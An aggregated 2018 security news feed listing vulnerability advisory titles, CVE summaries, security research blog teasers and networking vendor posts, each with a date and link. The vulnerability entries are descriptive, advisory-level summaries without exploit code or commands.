We’re proud to announce the release of Winchecksec, a new open-source tool that detects security features in Windows binaries. Developed to satisfy our analysis and research needs, Winchecksec aims to surpass current open-source security feature detection tools in depth, accuracy, and performance without sacrificing simplicity. Feature detection, made simple Winchecksec takes a Windows PE binary […]

https://blog.trailofbits.com/2018/09/26/effortless-security-feature-detection-with-winchecksec/
Epee Levin Packet Deserialization Code Execution Vulnerability
2018-09-25T00:00:00Z | 1537833600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0637
FIRST address to the Global Commission on the Stability of Cyberspace
2018-09-22T10:00:00Z | 1537610400

Maarten Van Horenbeeck, Board Member of FIRST, delivers a statement to the Global Commission on the Stability of Cyberspace, in Singapore.

https://www.first.org/blog/20180923-GCSC_address
Security Alert (A18-09-06): Multiple Vulnerabilities in Adobe Reader/Acrobat
2018-09-20T04:00:00Z | 1537416000

Security updates are released for Adobe Reader/Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
eID foorumil pannakse paika e-identiteedi tulevik
2018-09-19T06:12:13Z | 1537337533

Täna ja homme toimub Kultuurikatlas rahvusvaheline eID foorum, mis keskendub elektroonilise identiteedi ning IT-lahenduste tulevikuküsimustele.

https://ria.ee/uudised/eid-foorumil-pannakse-paika-e-identiteedi-tulevik
Security Alert (A18-09-04): Multiple Vulnerabilities in Apple iOS
2018-09-18T04:00:00Z | 1537243200

Apple has released security updates in its latest iOS version 12 to fix 15 vulnerabilities identified in various iOS devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-09-05): Multiple Vulnerabilities in PHP
2018-09-18T04:00:00Z | 1537243200

Multiple vulnerabilities have been found in PHP. A remote attacker could exploit the vulnerabilities via specially crafted requests.

https://www.govcert.gov.hk/en/alerts_detail.php
Network Security and Direct Internet Access: The Foundation of MPLS WAN Transformation
2018-09-16T05:44:40Z | 1537076680

In a recent webinar we conducted at Cato, we asked the audience a poll question: “What is the primary driver for your SD-WAN project?” We were a bit surprised to find out that “secure, direct Internet access” was the top driver. We expected other drivers, such as MPLS cost reduction, eliminating bandwidth constraints, or optimizing... The post Network Security and Direct Internet Access: The Foundation of MPLS WAN Transformation appeared first on Cato Networks.

https://www.catonetworks.com/blog/network-security-and-direct-internet-access-the-foundation-of-mpls-wan-transformation/
Understanding the hidden costs of virtual CPE
2018-09-13T14:05:48Z | 1536847548

One of the interesting adjacent markets of SD-WAN is network functions virtualization (NFV) where it becomes possible to run branch and network services as virtual workloads. There are many benefits to virtualizing network functions such as increased agility, speed of deployment, and centralized management. ZK Research strongly recommends companies look at virtual services as part... The post Understanding the hidden costs of virtual CPE appeared first on Cato Networks.

https://www.catonetworks.com/blog/understanding-the-hidden-costs-of-virtual-cpe/
High Threat Security Alert (A18-09-02): Multiple Vulnerabilities in Microsoft Products (September 2018)
2018-09-12T04:00:00Z | 1536724800

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components. Reports indicate that exploitation of a zero-day vulnerability was detected against Windows systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-09-03): Vulnerability in Adobe Flash Player
2018-09-12T04:00:00Z | 1536724800

Adobe released a security update to address a vulnerability found in the Adobe Flash Player.

https://www.govcert.gov.hk/en/alerts_detail.php
Protecting Software Against Exploitation with DARPA’s CFAR
2018-09-10T13:00:55Z | 1536584455

Today, we’re going to talk about a hard problem that we are working on as part of DARPA’s Cyber Fault-Tolerant Attack Recovery (CFAR) program: automatically protecting software from 0-day exploits, memory corruption, and many currently undiscovered bugs. You might be thinking: “Why bother? Can’t I just compile my code with exploit mitigations like stack guard, […]

https://blog.trailofbits.com/2018/09/10/protecting-software-against-exploitation-with-darpas-cfar/
NordVPN VPN client connect privilege escalation vulnerability
2018-09-07T00:00:00Z | 1536278400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0622
ProtonVPN VPN client connect privilege escalation vulnerability
2018-09-07T00:00:00Z | 1536278400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0679
Domain Name Consolidation: Observations From the Field
2018-09-06T20:04:00Z | 1536264240

The market and marketing of Web property domain names is changing. Companies prefer to promote top level domains (TLDs), have the option of selecting brand-relevant domain extensions (e.g. SaaS.com), and no longer need country-relevant domains to optimize search engine result rankings.

https://www.akamai.com/blog/trends/domain-name-consolidation-observations
cURL (libcurl) NTLM Authentication Code Buffer Overrun Vulnerability
2018-09-06T11:30:00Z | 1536233400

curl before version 7.61.1 is vulnerable to a buffer overrun in the NTLM authentication code. The internal function Curl_ntlm_core_mk_nt_hash multiplies the length of the password by two (SUM) to figure out how large temporary storage area to allocate from the heap. The length value is then subsequently used to iterate over the password and generate output into the allocated storage buffer. On systems with a 32 bit size_t, the math to calculate SUM triggers an integer overflow when the password length exceeds 2GB (2^31 bytes). This integer overflow usually causes a very small buffer to actually get allocated instead of the intended very huge one, making the use of that buffer end up in a heap buffer overflow. (This bug is almost identical to CVE-2017-8816.) CVE: CVE-2018-14618 Last updated: Sept. 6, 2018, 11:30 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0014
Rattle – an Ethereum EVM binary analysis framework
2018-09-06T06:30:38Z | 1536215438

Most smart contracts have no verified source code, but people still trust them to protect their cryptocurrency. What’s more, several large custodial smart contracts have had security incidents. The security of contracts that exist on the blockchain should be independently ascertainable. Ethereum VM (EVM) Bytecode Ethereum contracts are compiled to EVM – the Ethereum Virtual […]

https://blog.trailofbits.com/2018/09/06/rattle-an-ethereum-evm-binary-analysis-framework/
Security Alert (A18-09-01): Multiple Vulnerabilities in Firefox
2018-09-06T04:00:00Z | 1536206400

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai India's StandTall Program
2018-09-06T04:00:00Z | 1536206400

Diversity and Inclusion is a mission-critical goal at Akamai. In support of this goal, the India Learning and Development team in collaboration with the Women's Forum India (employee resource group), launched an initiative that aims to foster a culture of...

https://www.akamai.com/blog/culture/standtall-program-at-akamai
A New Approach to SD-WAN Management
2018-09-05T10:03:23Z | 1536141803

For a while now, there have been two basic SD-WAN solutions offering a choice between DIY (appliance-based) or fully managed (service-based) solutions. Each choice has its advantages, but they also have distinct disadvantages. Being at opposite ends of the spectrum, customers are increasingly preferring an SD-WAN solution that encompasses the advantages of both solutions. In... The post A New Approach to SD-WAN Management appeared first on Cato Networks.

https://www.catonetworks.com/blog/a-new-approach-to-sd-wan-management/
Contract upgrade anti-patterns
2018-09-05T10:00:21Z | 1536141621

A popular trend in smart contract design is to promote the development of upgradable contracts. At Trail of Bits, we have reviewed many upgradable contracts and believe that this trend is going in the wrong direction. Existing techniques to upgrade contracts have flaws, increase the complexity of the contract significantly, and ultimately introduce bugs. To […]

https://blog.trailofbits.com/2018/09/05/contract-upgrade-anti-patterns/
ERPNext SQL Injection Vulnerabilities
2018-09-05T00:00:00Z | 1536105600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0560
Back to School with SD-WAN
2018-09-02T07:39:49Z | 1535873989

We have all seen the signs that a new season has begun. No, we’re not talking about the fall season – it’s back to school season! The season is filled with shopping for school supplies and a new outfit for the first day. So in the spirit of the season, we’ve decided to create a... The post Back to School with SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/back-to-school-with-sd-wan/
Linux Kernel Crypto Subsystem Vulnerability
2018-08-30T16:00:00Z | 1535644800

A flaw was found in the crypto subsystem of the Linux kernel before version kernel-4.15-rc4. The "null skcipher" was being dropped when each af_alg_ctx was freed instead of when the aead_tfm was freed. This can cause the null skcipher to be freed while it is still in use leading to a local user being able to crash the system or possibly escalate privileges. CVE: CVE-2018-14619 Last updated: Aug. 30, 2018, 4 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0013
Apache Struts Remote Code Execution Vulnerability
2018-08-30T15:00:00Z | 1535641200

Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn't have value and action set and in same time, its upper action(s) have no or wildcard namespace. CVE: CVE-2018-11776 Last updated: Aug. 30, 2018, 3 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0012
The SD-WAN Features Needed to Accelerate Global Application Delivery
2018-08-29T09:07:48Z | 1535533668

SD-WANs are the go-to alternative for enterprises looking to reimagine their networks. With the right mix of SD-WAN features, IT can improve agility, availability, and, yes, even lower their network transport costs. Where SD-WAN Falls Short And yet for all of the good cheer promised by SD-WAN, anyone who’s tried to deliver a global network... The post The SD-WAN Features Needed to Accelerate Global Application Delivery appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-sd-wan-features-needed-to-accelerate-global-application-delivery/
Introducing windows-acl: working with ACLs in Rust
2018-08-23T11:50:39Z | 1535025039

Access Control Lists (ACLs) are an integral part of the Microsoft Windows security model. In addition to controlling access to secured resources, they are also used in sandboxing, event auditing, and specifying mandatory integrity levels. They are also exceedingly painful to programmatically manipulate, especially in Rust. Today, help has arrived — we released windows-acl, a […]

https://blog.trailofbits.com/2018/08/23/introducing-windows-acl-working-with-acls-in-rust/
High Threat Security Alert (A18-08-08): Vulnerability in Apache Struts
2018-08-23T04:00:00Z | 1534996800

Apache has released a new version of Apache Struts to address a vulnerability caused by misconfiguration in namespace. A remote attacker could exploit the vulnerability by sending a specially crafted request to the affected systems.

https://www.govcert.gov.hk/en/alerts_detail.php
OpenSSH user enumeration vulnerability
2018-08-22T16:00:00Z | 1534953600

OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. CVE: CVE-2018-15473 Last updated: Aug. 22, 2018, 4 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0011
Get an open-source security multiplier
2018-08-22T04:05:44Z | 1534910744

An increasing number of organizations and companies (including the federal government) rely on open-source projects in their security operations architecture, secure development tools, and beyond. Open-source solutions offer numerous advantages to development-savvy teams ready to take ownership of their security challenges. Teams can implement them to provide foundational capabilities, like “process logs” or “access machine […]

https://blog.trailofbits.com/2018/08/22/get-an-open-source-security-multiplier/
Giving Back through Danny Lewin Community Care Days
2018-08-22T04:00:00Z | 1534910400

Akamai was fortunate to have Danny Lewin as a co-founder and role model for our business, our culture, and our sense of adventure and accomplishment. It was Danny who helped to instill the Big Idea that we would change the...

https://www.akamai.com/blog/culture/danny-lewin-community-care-days
Security Alert (A18-08-07): Multiple Vulnerabilities in Apache Tomcat
2018-08-20T04:00:00Z | 1534737600

Apache Software Foundation has released new versions of Apache Tomcat Native to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Foreshadow- L1 Terminal Fault: VMM
2018-08-15T17:00:00Z | 1534352400

Systems with microprocessors utilizing speculative execution and address translations may allow unauthorized disclosure of information residing in the L1 data cache to an attacker with local user access with guest OS privilege via a terminal page fault and a side-channel analysis. CVE: CVE-2018-3646 Last updated: Aug. 15, 2018, 5 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0010
Foreshadow- L1 Terminal Fault: OS/SMM
2018-08-15T17:00:00Z | 1534352400

Systems with microprocessors utilizing speculative execution and address translations may allow unauthorized disclosure of information residing in the L1 data cache to an attacker with local user access via a terminal page fault and a side-channel analysis. CVE: CVE-2018-3620 Last updated: Aug. 15, 2018, 5 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0009
Foreshadow- L1 Terminal Fault: SGX
2018-08-15T16:00:00Z | 1534348800

Systems with microprocessors utilizing speculative execution and Intel® software guard extensions (Intel® SGX) may allow unauthorized disclosure of information residing in the L1 data cache from an enclave to an attacker with local user access via a side-channel analysis. CVE: CVE-2018-3615 Last updated: Aug. 15, 2018, 4 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0008
High Threat Security Alert (A18-08-05): Multiple Vulnerabilities in Microsoft Products (August 2018)
2018-08-15T04:00:00Z | 1534305600

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components. Reports indicate that exploitation of two zero-day vulnerabilities were detected against Internet Explorer and Windows systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-08-06): Multiple Vulnerabilities in Adobe Flash Player and Adobe Reader/Acrobat
2018-08-15T04:00:00Z | 1534305600

Security updates are released for Adobe Flash Player and Adobe Reader/Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Fault Analysis on RSA Signing
2018-08-14T16:39:52Z | 1534264792

This spring and summer, as an intern at Trail of Bits, I researched modeling fault attacks on RSA signatures. I looked at an optimization of RSA signing that uses the Chinese Remainder Theorem (CRT) and induced calculation faults that reveal private keys. I analyzed fault attacks at a low level rather than in […]

https://blog.trailofbits.com/2018/08/14/fault-analysis-on-rsa-signing/
Backbone Performance: Testing the Impact of Cato Cloud’s Optimized Routing on Latency
2018-08-14T08:08:35Z | 1534234115

It’s no secret that the Internet has a love-hate relationship with performance. Tidy and quick one day, slow and sluggish the next — Internet connections are anything but predictable. Which begs the question: how can an SD-WAN perform well if it’s based on the public Internet?   The key is replacing the Internet core with... The post Backbone Performance: Testing the Impact of Cato Cloud’s Optimized Routing on Latency appeared first on Cato Networks.

https://www.catonetworks.com/blog/backbone-performance-testing-the-impact-of-cato-clouds-optimized-routing-on-latency/
Security Alert (A18-08-04): Vulnerability in Oracle Database
2018-08-14T04:00:00Z | 1534219200

Oracle has released an advisory to address a vulnerability in Java VM component of Oracle Databases Server.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-08-03): Vulnerability in ISC BIND
2018-08-09T04:00:00Z | 1533787200

A vulnerability was found in "deny-answer-aliases" feature of the ISC BIND software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-08-01): Vulnerability in Linux Kernel
2018-08-08T04:00:00Z | 1533700800

A vulnerability was found in the Linux kernel of the affected operating systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-08-02): Vulnerability in Drupal
2018-08-08T04:00:00Z | 1533700800

Drupal released a security update to fix a vulnerability in Drupal.

https://www.govcert.gov.hk/en/alerts_detail.php
What is SD-WAN?
2018-08-07T14:49:37Z | 1533653377

The way in which organizations work is changing. Work is done in more places and the Internet has become central to how business is conducted. This means that corporate networks must change as well. The answer —  Software-Defined Wide Area Networks (SD-WANs). SD-WAN brings unparalleled agility and cost savings to networking. With SD-WAN, organizations can... The post What is SD-WAN? appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-is-sd-wan/
Datacenter Traces
2018-08-06T13:00:00Z | 1533560400

In our research we use actual traces, collected from different production datacenters.

https://www.akamai.com/blog/security/datacenter-traces
How Route Diversity in SD-WAN Provides MPLS-Like Determinism Required for Real-Time Traffic
2018-08-05T09:27:23Z | 1533461243

As I discussed in my previous post, real-time traffic has two characteristics that are challenging for the Internet. First, as the packets have a limited time value and cannot be re-transmitted, any significant change in the transport and packet delivery has the potential of being audible (or visible in the case of video) to the... The post How Route Diversity in SD-WAN Provides MPLS-Like Determinism Required for Real-Time Traffic appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-route-diversity-in-sd-wan-provides-mpls-like-determinism-required-for-real-time-traffic/
You could have invented that Bluetooth attack
2018-08-01T11:05:38Z | 1533121538

A serious bluetooth bug has received quite a bit of attention lately. It’s a great find by Biham and Newman. Given BLE’s popularity in the patch-averse IoT world, the bug has serious implications. And yet, it’s remarkably clean and simple. Unlike many elliptic curve bugs, an average human can totally understand the bug and how […]

https://blog.trailofbits.com/2018/08/01/bluetooth-invalid-curve-points/
Eesti juhtimisel valmis valimisturvalisuse käsiraamat
2018-07-31T21:00:00Z | 1533070800

Riigi Infosüsteemi Ameti eestvedamisel on valminud küberturvalisuse käsiraamat valimiste korraldajatele ja nende küberturvalisuse eest vastutajatele.

https://ria.ee/uudised/eesti-juhtimisel-valmis-valimisturvalisuse-kasiraamat
The 4 Values of SD-WAN
2018-07-30T06:15:56Z | 1532931356

The network perimeter has dissolved with IaaS, SaaS, and mobile users breaking that barrier and shifting more traffic to the Internet. MPLS was not designed for this new reality. SD-WAN addresses the problem not only by reducing network costs but also by providing more value in four ways-security, traffic, access, and the cloud SD-WAN –... The post The 4 Values of SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-4-values-of-sd-wan/
VLAN Network Segmentation ? What are The Hidden Costs?
2018-07-29T04:00:00Z | 1532836800

https://www.akamai.com/blog/security/hidden-cost-vlan-segmentation
Samsung SmartThings Hub hubCore ZigBee firmware update CRC16 check denial-of-service vulnerability
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0593
Samsung SmartThings Hub video-core samsungWifiScan Callback Code Execution Vulnerability
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0549
Samsung SmartThings Hub video-core credentials videoHostUrl Code Execution Vulnerability
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0554
Samsung SmartThings Hub video-core Database clips Code Execution Vulnerability
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0583
Samsung SmartThings Hub video-core RTSP Configuration Command Injection Vulnerability
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0539
Samsung SmartThings Hub video-core Camera URL Replace Code Execution Vulnerability
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0573
Samsung SmartThings Hub video-core clips Code Execution Vulnerability
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0570
Samsung SmartThings Hub hubCore Port 39500 HTTP Header Injection Vulnerability
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0578
Samsung SmartThings Hub video-core database shard code execution vulnerabilities
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0581
Samsung SmartThings Hub hubCore port 39500 sync denial-of-service vulnerability
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0582
Samsung SmartThings Hub video-core Camera Creation Code Execution Vulnerability
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0575
Samsung SmartThings Hub video-core Database shard.videoHostURL Code Execution Vulnerability
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0576
Samsung SmartThings Hub video-core samsungWifiScan Code Execution Vulnerability
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0548
Samsung SmartThings Hub video-core AWSELB Cookie Code Execution Vulnerability
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0591
Samsung SmartThings Hub hubCore Google Breakpad backtrace.io information disclosure vulnerability
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0594
Samsung SmartThings Hub video-core credentials Parsing SQL Injection Vulnerability
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0556
Samsung SmartThings Hub video-core Database find-by-cameraId Code Execution Vulnerability
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0557
Samsung SmartThings Hub video-core REST Request Parser HTTP Pipelining Injection Vulnerabilities
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0577
Samsung SmartThings Hub video-core Camera Update Code Execution Vulnerabilities
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0574
Samsung SmartThings Hub video-core credentials Code Execution Vulnerability
2018-07-26T00:00:00Z | 1532563200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0555
Security Alert (A18-07-07): Multiple Vulnerabilities in Apache Tomcat
2018-07-25T04:00:00Z | 1532491200

Apache Software Foundation has released new versions of Apache Tomcat to address multiple vulnerabilities which are caused by UTF-8 decoder flaw and tracking of connection closures.

https://www.govcert.gov.hk/en/alerts_detail.php
Sony IPELA E Series Camera measurementBitrateExec command injection vulnerability
2018-07-20T00:00:00Z | 1532044800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0604
Sony IPELA E Series Camera 802dot1xclientcert remote code execution vulnerability
2018-07-20T00:00:00Z | 1532044800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0605
FocalScope XML External Entity Injection Vulnerability
2018-07-20T00:00:00Z | 1532044800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0559
ACD Systems Canvas Draw 4 Huff Table Out-of-bounds Write Code Execution Vulnerability
2018-07-19T00:00:00Z | 1531958400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0543
ACD Systems Canvas Draw 4 IO Metadata Out-of-Bounds Write Code Execution Vulnerability
2018-07-19T00:00:00Z | 1531958400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0552
ACD Systems Canvas Draw 4 setRasterData Heap Overflow Code Execution Vulnerability
2018-07-19T00:00:00Z | 1531958400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0541
ACD Systems Canvas Draw 4 Resolution_Set Out of Bounds Write Code Execution Vulnerability
2018-07-19T00:00:00Z | 1531958400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0544
Foxit PDF Reader Javascript createTemplate nPage Remote Code Execution Vulnerability
2018-07-19T00:00:00Z | 1531958400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0606
Foxit PDF Reader Javascript MailForm Remote Code Execution Vulnerability
2018-07-19T00:00:00Z | 1531958400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0588
ACD Systems Canvas Draw 4 PlanarConfiguration Heap Overflow Code Execution Vulnerability
2018-07-19T00:00:00Z | 1531958400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0542
ACD Systems Canvas Draw 4 Invert Map Out-of-Bounds Write Code Execution Vulnerability
2018-07-19T00:00:00Z | 1531958400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0553
Cato Revolutionizes SD-WAN with Identity-Aware Routing
2018-07-18T12:40:51Z | 1531917651

Today, Cato introduced the first, identity-aware routing engine for SD-WAN. Identity awareness abstracts policy creation in Cato Cloud from the network and application architecture, enabling business-centric routing policies based on user identity and group affiliation. It headlines a series of SD-WAN enhancements we’re making today to Cato Cloud. You’ll be able to learn more about... The post Cato Revolutionizes SD-WAN with Identity-Aware Routing appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-revolutionizes-sd-wan-with-identity-aware-routing/
High Threat Security Alert (A18-07-06): Multiple Vulnerabilities in Oracle Java and Oracle Products (July 2018) (Updated)
2018-07-18T04:00:00Z | 1531886400

As proof-of-concept exploit code against CVE-2018-2893 were reported to be publicly disclosed, the risk of cyber attacks on the vulnerable Oracle WebLogic Server will be elevated.

https://www.govcert.gov.hk/en/alerts_detail.php
Experiment: Improving Page Load Times with Script Streaming
2018-07-17T23:55:00Z | 1531871700

https://www.akamai.com/blog/performance/2024/sep/experiment-improving-page-load-times-with-script-streaming
HTTP+TLS and IPV6-Enablement Both in the Majority for World Cup Streaming
2018-07-17T13:00:00Z | 1531832400

The underlying protocols of the Internet continue to evolve, and massive events such as the World Cup are a great opportunity to see this in action.

https://www.akamai.com/blog/performance/http-tls-IPv6-enablement-majority-for-world-cup-streaming
SonicWall GMS XML-RPC Remote Code Execution Vulnerability
2018-07-17T00:00:00Z | 1531785600

A vulnerability in lack of validation of user-supplied parameters pass to XML-RPC calls on SonicWall Global Management System (GMS) virtual appliance's, allow remote user to execute arbitrary code. This vulnerability affected GMS version 8.1 and earlier. CVE: CVE-2018-9866 Last updated: Aug. 3, 2018, 1:44 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0007
A Technology Horror Story: The Day the Marketing Guy Joined the Hackathon
2018-07-11T04:30:58Z | 1531283458

The fifth floor of the cafeteria at Cato’s Israeli office transformed last Thursday morning nearly two weeks ago into a celebration of innovation, coding, and food. Our 2018 Hackathon was kicking off with a sumptuous breakfast buffet decorating the tables, and flags of the 10 project teams dotting the floor-to-ceiling windows that looked out onto... The post A Technology Horror Story: The Day the Marketing Guy Joined the Hackathon appeared first on Cato Networks.

https://www.catonetworks.com/blog/a-technology-horror-story-the-day-the-marketing-guy-joined-the-hackathon/
Security Alert (A18-07-04): Multiple Vulnerabilities in Microsoft Products (July 2018)
2018-07-11T04:00:00Z | 1531281600

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-07-05): Multiple Vulnerabilities in Adobe Flash Player and Adobe Reader/Acrobat
2018-07-11T04:00:00Z | 1531281600

Security updates are released for Adobe Flash Player and Adobe Reader/Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Computerinsel Photoline ANI Parsing Code Execution Vulnerability
2018-07-11T00:00:00Z | 1531267200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0586
Computerinsel Photoline PSD Blending Channel Code Execution Vulnerability
2018-07-11T00:00:00Z | 1531267200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0585
Computerinsel Photoline PCX Run Length Encoding Code Execution Vulnerability
2018-07-11T00:00:00Z | 1531267200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0587
Security Alert (A18-07-03): Multiple Vulnerabilities in Apple iOS
2018-07-10T04:00:00Z | 1531195200

Apple has released security updates in its latest iOS version 11.4.1 to fix 22 vulnerabilities identified in various iOS devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Adobe Acrobat Reader DC Collab newWrStreamToCosObj Remote Code Execution Vulnerability
2018-07-10T00:00:00Z | 1531180800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0590
Adobe Acrobat Reader DC JSON Stringify Remote Code Execution Vulnerability
2018-07-10T00:00:00Z | 1531180800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0592
Antenna House Office Server Document Converter putlsttbl code execution vulnerability
2018-07-10T00:00:00Z | 1531180800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0599
Antenna House Office Server Document Converter vbputanld code execution vulnerability
2018-07-10T00:00:00Z | 1531180800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0600
Antenna House Office Server Document Converter OLEread Code Execuction Vulnerability
2018-07-10T00:00:00Z | 1531180800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0596
Antenna House Office Server Document Converter GetShapePropery 0x105 code execution vulnerability
2018-07-10T00:00:00Z | 1531180800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0603
Antenna House Office Server Document Converter vbgetfp code execution vulnerability
2018-07-10T00:00:00Z | 1531180800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0597
Antenna House Office Server Document Converter putShapeProperty Code Execution Vulnerability
2018-07-10T00:00:00Z | 1531180800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0598
Adobe Acrobat Reader DC Collab.drivers Remote Code Execution Vulnerability
2018-07-10T00:00:00Z | 1531180800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0569
vulnerability at mysonicwall.com that leads to Remote Code Execution (RCE)
2018-07-09T00:00:00Z | 1531094400

Telerik.Web.UI in Progress Telerik UI for ASP.NET AJAX before R1 2017 and R2 before R2 2017 SP2 uses weak RadAsyncUpload encryption, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code. CVE: CVE-2017-11317 Last updated: July 9, 2018, midnight

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0006
Optimizing Lifted Bitcode with Dead Store Elimination
2018-07-06T11:50:11Z | 1530877811

Tim Alberdingk Thijm As part of my Springternship at Trail of Bits, I created a series of data-flow-based optimizations that eliminate most “dead” stores that emulate writes to machine code registers in McSema-lifted programs. For example, applying my dead-store-elimination (DSE) passes to Apache httpd eliminated 117,059 stores, or 50% of the store operations to Remill’s […]

https://blog.trailofbits.com/2018/07/06/optimizing-lifted-bitcode-with-dead-store-elimination/
Security Alert (A18-07-02): Multiple Vulnerabilities in Android
2018-07-05T04:00:00Z | 1530763200

Google has released security patch levels of 2018-07-01 and 2018-07-05 to fix 44 vulnerabilities identified in various Android devices.

https://www.govcert.gov.hk/en/alerts_detail.php
The $12,000 Intersection between Clickjacking, XSS, and Denial of Service
2018-07-04T00:00:00Z | 1530662400

The specific application that I've been targeting over the last few weeks is a bitcoin gambling website where a stock will progressively rise over time. The gambler decides the amount of money they would like to put in and a multiplier to payout at. As the multiplier goes up, they have an option to click a button and receive whatever returns they had made it to. Each time the multiplier goes up, there is a chance the stock will "bust" and all of the investment will be lost.

https://samcurry.net/the-12000-intersection-between-clickjacking-xss-and-denial-of-service
Top 11 Women in Enterprise Networking
2018-07-03T12:22:44Z | 1530620564

Identifying female role models in the technology sector is important for so many reasons, the most important being that female representation in IT is severely lacking. A 2017 survey by ISACA “The Future Tech Workforce: Breaking Gender Barriers” found that 87% of respondents were concerned about the low numbers of women in the technology sector;... The post Top 11 Women in Enterprise Networking appeared first on Cato Networks.

https://www.catonetworks.com/blog/top-11-women-in-enterprise-networking/
Uus ID-kaardi rakendus DigiDoc 4 jõuab arvutitesse
2018-07-03T06:28:43Z | 1530599323

Nädala jooksul jõuab kõikide inimeste arvutitesse ID-kaardi uus rakendus DigiDoc4 Klient, milles saab teha kõiki ID-kaardiga seotud toiminguid – anda digiallkirja, krüpteerida dokumente ning vahetada PIN-koode.

